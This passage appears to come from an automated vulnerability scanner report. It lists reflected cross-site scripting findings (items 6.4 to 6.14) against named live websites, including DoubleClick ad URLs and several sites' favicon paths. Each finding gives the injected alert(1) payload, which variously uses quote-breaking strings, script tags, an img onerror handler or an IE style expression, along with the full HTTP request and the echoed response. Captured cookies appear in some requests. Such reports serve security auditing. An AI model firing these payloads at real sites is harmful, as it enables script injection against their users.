The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20aba"-alert(1)-"6d10011bb3f was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-406387893378091220aba"-alert(1)-"6d10011bb3f&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:59:52 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:59:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
RtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-406387893378091220aba"-alert(1)-"6d10011bb3f&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

6.4. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d09c"-alert(1)-"9ece5572fb6 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=16d09c"-alert(1)-"9ece5572fb6&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:58:24 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:58:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
A7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=16d09c"-alert(1)-"9ece5572fb6&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/free-easy-webex-together.html%3FTrackID%3D1024048");
var fscUrl = url;
var fsc
...[SNIP]...

6.5. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e478"-alert(1)-"cf73551e9d0 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ1e478"-alert(1)-"cf73551e9d0&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:59:10 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:59:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ1e478"-alert(1)-"cf73551e9d0&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

6.6. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de85f"-alert(1)-"20e7d43f519 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lde85f"-alert(1)-"20e7d43f519&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:57:17 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:57:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/1b7/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lde85f"-alert(1)-"20e7d43f519&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRl
...[SNIP]...

6.7. http://www.4shared.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f45e'-alert(1)-'47a61c2d0ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3f45e'-alert(1)-'47a61c2d0ed HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico3f45e'-alert(1)-'47a61c2d0ed
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1459F926DDE8BF905A4995BCC43D1519.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:25:12 GMT
Content-Length: 41850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/favicon.ico3f45e'-alert(1)-'47a61c2d0ed',
remember : false


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

6.8. http://www.4shared.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15164"-alert(1)-"dd8c6187af5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico15164"-alert(1)-"dd8c6187af5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico15164&quot;-alert(1)-&quot;dd8c6187af5
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=61CB2DAE3C41A134AF4364A8D421487B.dc330; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:25:11 GMT
Content-Length: 41151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.ico15164"-alert(1)-"dd8c6187af5";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

6.9. http://www.aboutus.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aboutus.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e07"><script>alert(1)</script>fd9b551f005 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod2e07"><script>alert(1)</script>fd9b551f005 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aboutus.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.1
ETag: "64d7e41dd2260249cada85edd9738f53"
X-Runtime: 121
Content-Length: 13392
Set-Cookie: logged_in=false; path=/
Set-Cookie: _aboutus_session_key=BAh7BzoPc2Vzc2lvbl9pZCIlMTY5MTgwMTgzNDlmM2ZmZGJkNzIwNmY4ZGRjOTlhNjEiDWFiX2luZGV4aSs%3D--b35a502024b9ad39567b1317c2a187f617c7104f; path=/; expires=Mon, 02-Apr-2012 13:43:11 GMT; HttpOnly
Cache-Control: max-age=0, public
X-Au-Rails-Sha1: 65ba32a
Server: nginx/0.8.54 + Phusion Passenger 3.0.1 (mod_rails/mod_rack)
X-node-id: rogue
Set-Cookie: SERVERID=rogue; path=/


<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="description" content="Favicon.Icod2e07"><Script>Alert(1)</Script>Fd9b551f005 - Learn from the experts and community at AboutUs.org" />
...[SNIP]...

6.10. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e888a"-alert(1)-"bb943823954 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e888a"-alert(1)-"bb943823954 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 The page you requested could not be found.
Date: Sat, 02 Apr 2011 13:38:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=2a30daa2c5964f7e7295;path=/
Set-Cookie: SERVERID=web6;path=/
Set-Cookie: IIA=%2D3;expires=Sun, 03-Apr-2011 13:38:49 GMT;path=/
Set-Cookie: IIA=%2D2;expires=Sun, 03-Apr-2011 13:38:49 GMT;path=/
Set-Cookie: PAGEID=594366435;path=/
Set-Cookie: TS=2011%2D04%2D02%2008%3A38%3A49%2E447;path=/
Set-Cookie: COMPONENTID=0;expires=Mon, 25-Mar-2041 13:38:49 GMT;path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 47445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content
...[SNIP]...
ot found, but...";
       s_ab.prop10 = "3471360";
       s_ab.prop11 = "";
       s_ab.prop12 = "landingpageobject";
       s_ab.prop13 = "AllBusiness.com";
       s_ab.prop14 = "";
       s_ab.prop15 = "www.allbusiness.com/e888a"-alert(1)-"bb943823954";
       s_ab.prop16 = "";
       s_ab.prop17 = "";
       s_ab.prop18 = "";
       s_ab.prop19 = "";
       s_ab.prop20 = "";
       s_ab.prop21 = "";
       s_ab.prop22 = "";
       s_ab.prop23 = "";
       s_ab.prop24 = "";
       s_ab.p
...[SNIP]...

6.11. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c535f"><img%20src%3da%20onerror%3dalert(1)>8e7e657d535 was submitted in the REST URL parameter 1. This input was echoed as c535f"><img src=a onerror=alert(1)>8e7e657d535 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c535f"><img%20src%3da%20onerror%3dalert(1)>8e7e657d535 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 The page you requested could not be found.
Date: Sat, 02 Apr 2011 13:38:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=ac30c795cbb9533a1273;path=/
Set-Cookie: SERVERID=web7;path=/
Set-Cookie: IIA=%2D3;expires=Sun, 03-Apr-2011 13:38:47 GMT;path=/
Set-Cookie: IIA=%2D2;expires=Sun, 03-Apr-2011 13:38:47 GMT;path=/
Set-Cookie: PAGEID=594366418;path=/
Set-Cookie: TS=2011%2D04%2D02%2008%3A38%3A47%2E92;path=/
Set-Cookie: COMPONENTID=0;expires=Mon, 25-Mar-2041 13:38:47 GMT;path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 47481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content
...[SNIP]...
<form method="post" id="formWrapper_1" name="formWrapper_1" action="https://www.allbusiness.com/c535f"><img src=a onerror=alert(1)>8e7e657d535?server=web7&sid=ac30c795cbb9533a1273">
...[SNIP]...

6.12. http://www.allvoices.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5dd6"><script>alert(1)</script>e219c4ca2fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe5dd6"><script>alert(1)</script>e219c4ca2fb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allvoices.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-QueryCount: 2
X-Runtime: 17ms
X-QueryRuntime: 0.00090
Cache-Control: no-cache
Set-Cookie: _T_=c2xmzossd34irl5oaei3kdcgc; path=/; expires=Sun, 03 Apr 2011 01:33:36 GMT
Set-Cookie: page_url=http%3A%2F%2Fwww.allvoices.com%2Ffavicon.icoe5dd6%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee219c4ca2fb; path=/
Set-Cookie: masala_session_id=cc123cc7f9309ecd4fb448f3e3eaa04c; path=/
Content-Length: 27741
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<meta property="og:url" content="http://www.allvoices.com/favicon.icoe5dd6"><script>alert(1)</script>e219c4ca2fb"/>
...[SNIP]...

6.13. http://www.answerbag.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerbag.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1dcf8'><script>alert(1)</script>60b16937f0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico1dcf8'><script>alert(1)</script>60b16937f0b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.answerbag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:24:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=37e025c3a2f50dca596f6e4370459fb4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org
...[SNIP]...
<meta property='og:url' content='http://www.answerbag.com/favicon.ico1dcf8'><script>alert(1)</script>60b16937f0b' />
...[SNIP]...

6.14. http://www.beyond.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beyond.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e5463%20style%3dx%3aexpression(alert(1))%20fd7a74860e was submitted in the REST URL parameter 1. This input was echoed as e5463 style=x:expression(alert(1)) fd7a74860e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.icoe5463%20style%3dx%3aexpression(alert(1))%20fd7a74860e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beyond.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

